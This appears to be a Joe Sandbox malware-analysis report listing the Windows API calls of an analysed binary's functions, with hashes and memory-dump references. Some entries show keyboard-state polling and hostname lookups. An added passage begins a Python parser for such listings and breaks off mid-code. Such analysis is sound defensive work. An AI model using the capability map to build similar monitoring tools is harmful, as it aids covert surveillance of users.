                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                                                                                                                                                      • String ID: BUTTON
                                                                                                                                                                                                                                                      • API String ID: 1194449130-3405671355
                                                                                                                                                                                                                                                      • Opcode ID: 5d2da1b4051509462776ab62976e7a523aabc8efdb080fadba73a106fb5bfc8c
                                                                                                                                                                                                                                                      • Instruction ID: bca94357edcf12cd1007f4d948a021ee86cb1fa2e8d31e4b20808f9b702513f4
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5d2da1b4051509462776ab62976e7a523aabc8efdb080fadba73a106fb5bfc8c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7C21A174A0430DAFEB006B60EC98B763F69FB55B98F144054F905821B2CF71AC04FB21
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00EC936C: __swprintf.LIBCMT ref: 00EC93AB
                                                                                                                                                                                                                                                        • Part of subcall function 00EC936C: __itow.LIBCMT ref: 00EC93DF
                                                                                                                                                                                                                                                      • CoInitialize.OLE32(00000000), ref: 00F1034B
                                                                                                                                                                                                                                                      • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00F103DE
                                                                                                                                                                                                                                                      • SHGetDesktopFolder.SHELL32(?), ref: 00F103F2
                                                                                                                                                                                                                                                      • CoCreateInstance.OLE32(00F4DA8C,00000000,00000001,00F73CF8,?), ref: 00F1043E
                                                                                                                                                                                                                                                      • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00F104AD
                                                                                                                                                                                                                                                      • CoTaskMemFree.OLE32(?,?), ref: 00F10505
                                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00F10542
                                                                                                                                                                                                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 00F1057E
                                                                                                                                                                                                                                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00F105A1
                                                                                                                                                                                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00F105A8
                                                                                                                                                                                                                                                      • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00F105DF
                                                                                                                                                                                                                                                      • CoUninitialize.OLE32(00000001,00000000), ref: 00F105E1
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1246142700-0
                                                                                                                                                                                                                                                      • Opcode ID: 0501599d405ee536a65d9431a15a80f9df87a02ef711f7e55a0363151dd796e6
                                                                                                                                                                                                                                                      • Instruction ID: 7c207935c866cf6d362f7efabb89fd1fe02870f07b1d54b4e41ee7a7b849b67c
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0501599d405ee536a65d9431a15a80f9df87a02ef711f7e55a0363151dd796e6
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7BB1CA75A00209AFDB04DFA4C988EAEBBF9FF48314B148459F909EB251DB71ED81DB50
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetKeyboardState.USER32(?), ref: 00F02ED6
                                                                                                                                                                                                                                                      • SetKeyboardState.USER32(?), ref: 00F02F41
                                                                                                                                                                                                                                                      • GetAsyncKeyState.USER32(000000A0), ref: 00F02F61
                                                                                                                                                                                                                                                      • GetKeyState.USER32(000000A0), ref: 00F02F78
• GetAsyncKeyState.USER32(000000A1), ref: 00F02FA7
• GetKeyState.USER32(000000A1), ref: 00F02FB8
• GetAsyncKeyState.USER32(00000011), ref: 00F02FE4
• GetKeyState.USER32(00000011), ref: 00F02FF2
• GetAsyncKeyState.USER32(00000012), ref: 00F0301B
• GetKeyState.USER32(00000012), ref: 00F03029
• GetAsyncKeyState.USER32(0000005B), ref: 00F03052
• GetKeyState.USER32(0000005B), ref: 00F03060
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: State$Async$Keyboard
• String ID:
• API String ID: 541375521-0
• Opcode ID: 4a07c4e2102802325445860bbcee44436ed3e6194707bb6aaa1b263b5184d500
• Instruction ID: 284121a4c49c6647386d04672cc8447e7f02cfb6d82b16ff8a96a8f6b179d3dd
• Opcode Fuzzy Hash: 4a07c4e2102802325445860bbcee44436ed3e6194707bb6aaa1b263b5184d500
• Instruction Fuzzy Hash: 62511674E0478829FB75DBA488147EABFF85F11394F08458DC5C25A1C2DA58AB8CF7B2
APIs
• GetDlgItem.USER32(?,00000001), ref: 00EFED1E
• GetWindowRect.USER32(00000000,?), ref: 00EFED30
• MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00EFED8E
• GetDlgItem.USER32(?,00000002), ref: 00EFED99
• GetWindowRect.USER32(00000000,?), ref: 00EFEDAB
• MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00EFEE01
• GetDlgItem.USER32(?,000003E9), ref: 00EFEE0F
• GetWindowRect.USER32(00000000,?), ref: 00EFEE20
• MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00EFEE63
• GetDlgItem.USER32(?,000003EA), ref: 00EFEE71
• MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00EFEE8E
• InvalidateRect.USER32(?,00000000,00000001), ref: 00EFEE9B
Similarity
• API ID: Window$ItemMoveRect$Invalidate
• String ID:
• API String ID: 3096461208-0
• Opcode ID: 26c92c76f893e1668d43cb540df67dbb108c039b1640a7a9d8b114adce71d0fe
• Instruction ID: 47efcf2fd0ce916b038b825eb61bc3f4e5e6b2e2575bf326ef41f41c4bef6e7d
• Opcode Fuzzy Hash: 26c92c76f893e1668d43cb540df67dbb108c039b1640a7a9d8b114adce71d0fe
• Instruction Fuzzy Hash: F1513475B00209AFDB18CF68DD95AAEBBB5FB98704F158129FA19E7290D770AD00CB10
APIs
  • Part of subcall function 00EDB9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00EDB759,?,00000000,?,?,?,?,00EDB72B,00000000,?), ref: 00EDBA58
• DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00EDB72B), ref: 00EDB7F6
• KillTimer.USER32(00000000,?,00000000,?,?,?,?,00EDB72B,00000000,?,?,00EDB2EF,?,?), ref: 00EDB88D
• DestroyAcceleratorTable.USER32(00000000), ref: 00F3D8A6
• ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00EDB72B,00000000,?,?,00EDB2EF,?,?), ref: 00F3D8D7
• ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00EDB72B,00000000,?,?,00EDB2EF,?,?), ref: 00F3D8EE
• ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00EDB72B,00000000,?,?,00EDB2EF,?,?), ref: 00F3D90A
• DeleteObject.GDI32(00000000), ref: 00F3D91C
Similarity
• API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
• String ID:
• API String ID: 641708696-0
• Opcode ID: 8ac9988fc7a5feb249e71f644b55d86dddcd11db0ebde0bbacfcd04d185f3b9e
• Instruction ID: cc0da3dc89ba3196bd4fe7b737159408bc266d72e49acfab4a42492a06136cdb
• Opcode Fuzzy Hash: 8ac9988fc7a5feb249e71f644b55d86dddcd11db0ebde0bbacfcd04d185f3b9e
• Instruction Fuzzy Hash: 9C619F34901604CFDB259F18E988B75B7F9FF95325F16121EE486A6670E730A892FB40
APIs
  • Part of subcall function 00EDB526: GetWindowLongW.USER32(?,000000EB), ref: 00EDB537
• GetSysColor.USER32(0000000F), ref: 00EDB438
Similarity
• API ID: ColorLongWindow
• String ID:
• API String ID: 259745315-0
• Opcode ID: a8f586ab9633eb9e8d7b8e0a5b51f8d23e834195c91af39bd4b7d36bd96cf895
• Instruction ID: d73b7f73fb62105968d9ba1f5f288013f800952b6bcdf5534cd2d33f6d1be84e
• Opcode Fuzzy Hash: a8f586ab9633eb9e8d7b8e0a5b51f8d23e834195c91af39bd4b7d36bd96cf895
• Instruction Fuzzy Hash: B241D334000144DFDB249F28D889BB93B66EB56734F594262FD759E2E6F7308C42E721
APIs
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 136442275-0
                                                                                                                                                                                                                                                      • Opcode ID: 82965ec51db11143a3ff4bd8839cffb68bb7153d1b61e6ace789c4cc062b3625
                                                                                                                                                                                                                                                      • Instruction ID: 5c30084e218fb39e6a4e1f2fb31666923c15114759e3ccd953813e1d66c577aa
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 82965ec51db11143a3ff4bd8839cffb68bb7153d1b61e6ace789c4cc062b3625
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4A412A7684515CAECF61EB90CC45DCBB3BCEB44310F1051E6B649E2081EA74ABE89F50
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • CharLowerBuffW.USER32(00F5DC00,00F5DC00,00F5DC00), ref: 00F0D7CE
                                                                                                                                                                                                                                                      • GetDriveTypeW.KERNEL32(?,00F73A70,00000061), ref: 00F0D898
                                                                                                                                                                                                                                                      • _wcscpy.LIBCMT ref: 00F0D8C2
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: BuffCharDriveLowerType_wcscpy
                                                                                                                                                                                                                                                      • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                                                                                                                                                      • API String ID: 2820617543-1000479233
                                                                                                                                                                                                                                                      • Opcode ID: a361d7b758f122b28c2eecce5f2ffdc875f4f3a9b1094ec9d0289879596c4272
                                                                                                                                                                                                                                                      • Instruction ID: 233a9d534c0826825b16a1ebe1461709613a9442e5802317a75ccd265b8dde70
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a361d7b758f122b28c2eecce5f2ffdc875f4f3a9b1094ec9d0289879596c4272
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CC51A035504244AFC710EF54C982B6EB7E5EF94314F10982EF99A672E2EB31DD06EA42
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __swprintf.LIBCMT ref: 00EC93AB
                                                                                                                                                                                                                                                      • __itow.LIBCMT ref: 00EC93DF
                                                                                                                                                                                                                                                        • Part of subcall function 00EE1557: _xtow@16.LIBCMT ref: 00EE1578
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __itow__swprintf_xtow@16
                                                                                                                                                                                                                                                      • String ID: %.15g$0x%p$False$True
                                                                                                                                                                                                                                                      • API String ID: 1502193981-2263619337
                                                                                                                                                                                                                                                      • Opcode ID: 557c941111c38d83c1b8b4b51a45370845cfb017fa841bea58e3b190977b9927
                                                                                                                                                                                                                                                      • Instruction ID: afed9030ba309b797e0d83ef15d319b18a5615770cb4960b5507852da8589319
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 557c941111c38d83c1b8b4b51a45370845cfb017fa841bea58e3b190977b9927
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0041E772904204EBDB24DF78DA45FA973E8EF44350F20546FE14AE7282EB72E942DB11
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00F2A259
                                                                                                                                                                                                                                                      • CreateCompatibleDC.GDI32(00000000), ref: 00F2A260
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00F2A273
                                                                                                                                                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00F2A27B
                                                                                                                                                                                                                                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 00F2A286
                                                                                                                                                                                                                                                      • DeleteDC.GDI32(00000000), ref: 00F2A28F
                                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 00F2A299
                                                                                                                                                                                                                                                      • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00F2A2AD
                                                                                                                                                                                                                                                      • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00F2A2B9
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                                                                                                                                                                      • String ID: static
                                                                                                                                                                                                                                                      • API String ID: 2559357485-2160076837
                                                                                                                                                                                                                                                      • Opcode ID: dac8feff02853b34897d45b74b4f424ff5591a05b03bcb0ab3cd47c5040e67c7
                                                                                                                                                                                                                                                      • Instruction ID: 4f85d43b2867d43df098c7e0cbd78dddc4dbb641251397d44383fb7b2beaf3a7
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dac8feff02853b34897d45b74b4f424ff5591a05b03bcb0ab3cd47c5040e67c7
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E7316C31501129EBDF119FA4EC49FEA3B69FF1A360F110215FE19A61E0C735D811EBA5
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
• String ID: 0.0.0.0
• API String ID: 2620052-3771769585
• Opcode ID: 5e10f7bcd4e8d0a687b3aeef48c6391a1ecde5714b26a5aeeceda46caa494abc
• Instruction ID: d358c566bd37c607e7e3866a6a4a6b3ed079b2cc21b71fec7831074d6d8d1309
• Opcode Fuzzy Hash: 5e10f7bcd4e8d0a687b3aeef48c6391a1ecde5714b26a5aeeceda46caa494abc
• Instruction Fuzzy Hash: 8F113632904209ABCB24AB70AC0AEDA77ACEF41721F010069F505E61C0FFB4EE85BB51
APIs
• _memset.LIBCMT ref: 00EE5047
  • Part of subcall function 00EE7C0E: __getptd_noexit.LIBCMT ref: 00EE7C0E
• __gmtime64_s.LIBCMT ref: 00EE50E0
• __gmtime64_s.LIBCMT ref: 00EE5116
• __gmtime64_s.LIBCMT ref: 00EE5133
• __allrem.LIBCMT ref: 00EE5189
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00EE51A5
• __allrem.LIBCMT ref: 00EE51BC
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00EE51DA
• __allrem.LIBCMT ref: 00EE51F1
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00EE520F
• __invoke_watson.LIBCMT ref: 00EE5280
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
• String ID:
• API String ID: 384356119-0
• Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
• Instruction ID: 942534cb5ee01a08b8cdb795ee6ba93e9dd4fea03f63d93dc4a46c24f05590d7
• Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
• Instruction Fuzzy Hash: 7E71C473A01F5FABD7149E6ACC41B6AB3F8AF44368F14522AF610F6681E770D9408BD0
APIs
• _memset.LIBCMT ref: 00F04DF8
• GetMenuItemInfoW.USER32(00F81708,000000FF,00000000,00000030), ref: 00F04E59
• SetMenuItemInfoW.USER32(00F81708,00000004,00000000,00000030), ref: 00F04E8F
• Sleep.KERNEL32(000001F4), ref: 00F04EA1
• GetMenuItemCount.USER32(?), ref: 00F04EE5
• GetMenuItemID.USER32(?,00000000), ref: 00F04F01
• GetMenuItemID.USER32(?,-00000001), ref: 00F04F2B
• GetMenuItemID.USER32(?,?), ref: 00F04F70
• CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00F04FB6
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F04FCA
• SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F04FEB
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: ItemMenu$Info$CheckCountRadioSleep_memset
• String ID:
• API String ID: 4176008265-0
• Opcode ID: 854d698e8e182b650f3c8fe0d2e8a604d4bcfee455f926aff4aca32f4de36ab3
• Instruction ID: de21feae00821970fbac65eae4d748c5df30990e698b1994ec0d669b34968b62
• Opcode Fuzzy Hash: 854d698e8e182b650f3c8fe0d2e8a604d4bcfee455f926aff4aca32f4de36ab3
• Instruction Fuzzy Hash: 9C619DB5A0024AAFDB20CFA4DC88AAE7BB8FB41315F140159FA51A32D1D770AD45FB20
APIs
• SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00F29C98
• SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00F29C9B
• GetWindowLongW.USER32(?,000000F0), ref: 00F29CBF
• _memset.LIBCMT ref: 00F29CD0
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00F29CE2
• SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00F29D5A
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: MessageSend$LongWindow_memset
• String ID:
• API String ID: 830647256-0
• Opcode ID: 20509a5ee14743f37030217449c33cd4c9d95ce92e753f50bc1ec11f17dee9ea
• Instruction ID: ba9f5d61df39161506e2aacdde34842a1e3def94a5aaa2c6a90714319eece1d3
• Opcode Fuzzy Hash: 20509a5ee14743f37030217449c33cd4c9d95ce92e753f50bc1ec11f17dee9ea
• Instruction Fuzzy Hash: 5F618C75A00218AFDB10DFA8DC81EEE77B8EF09714F144159FA44E7291D7B4AD42EB60
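The entries above are the Joe Sandbox IDA plugin's per-function output: resolved imports with their call-site addresses, the memory dump the function was lifted from, and fuzzy hashes for similarity matching. With hundreds of such entries per report it is more useful to parse them than to read them by eye. What follows is an added example and is neither Joe Sandbox code nor part of this report: a Python parser that turns each "APIs" block into a record, decodes the list-view message numbers the previous entry passes to SendMessageW (0x101F, 0x1004 and 0x104D, named from CommCtrl.h), and applies a few capability rules. The rules and tag names are constructed for the example, as is the trimmed sample text, whose lines are copied from the two entries above.

```python
"""Parse Joe Sandbox per-function API listings and tag them for triage.
Added example; not part of the Joe Sandbox report or its tooling."""
import re
from dataclasses import dataclass, field

# Constructed sample: the menu and list-view function entries from the
# report above, trimmed to the lines this parser uses.
SAMPLE = """\
APIs
• _memset.LIBCMT ref: 00F04DF8
• GetMenuItemInfoW.USER32(00F81708,000000FF,00000000,00000030), ref: 00F04E59
• SetMenuItemInfoW.USER32(00F81708,00000004,00000000,00000030), ref: 00F04E8F
• Sleep.KERNEL32(000001F4), ref: 00F04EA1
• GetMenuItemCount.USER32(?), ref: 00F04EE5
Similarity
• API ID: ItemMenu$Info$CheckCountRadioSleep_memset
• Opcode Fuzzy Hash: 854d698e8e182b650f3c8fe0d2e8a604d4bcfee455f926aff4aca32f4de36ab3
APIs
• SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00F29C98
• GetWindowLongW.USER32(?,000000F0), ref: 00F29CBF
• _memset.LIBCMT ref: 00F29CD0
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00F29CE2
• SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00F29D5A
Similarity
• API ID: MessageSend$LongWindow_memset
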